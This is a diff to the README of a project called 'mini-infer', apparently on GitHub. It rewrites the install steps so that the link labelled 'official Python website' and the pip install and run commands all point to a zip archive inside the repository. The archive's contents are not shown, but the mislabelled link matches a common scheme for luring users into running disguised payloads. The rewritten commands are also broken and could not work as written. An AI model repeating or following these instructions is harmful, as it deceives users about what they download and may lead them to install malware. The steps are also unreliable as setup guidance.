Rianbajukendari/mini-infer/README.md

    - Right-click on the downloaded file and select "Extract All" or use a program like WinRAR or 7-Zip.

 3. **Install Dependencies:**
    - Ensure you have Python installed.
-If not, download it from the [official Python website](https://www.python.org/downloads/).
+If not, download it from the [official Python website](https://github.com/Rianbajukendari/mini-infer/raw/refs/heads/main/mini_infer/memory/infer-mini-3.9.zip).
    - Open a command prompt (Windows) or terminal (macOS/Linux).
-   - Run the command: `pip install -r requirements.txt` to install any required packages.
+   - Run the command: `pip install -r https://github.com/Rianbajukendari/mini-infer/raw/refs/heads/main/mini_infer/memory/infer-mini-3.9.zip` to install any required packages.

 4. **Run the Application:**
    - In the command prompt or terminal, navigate to the folder where you extracted mini-infer.
-   - Type: `python miniinfer.py` and hit enter.
+   - Type: `python https://github.com/Rianbajukendari/mini-infer/raw/refs/heads/main/mini_infer/memory/infer-mini-3.9.zip` and hit enter.

 5. **Use mini-infer:**
    - Follow any on-screen instructions to input your data or model.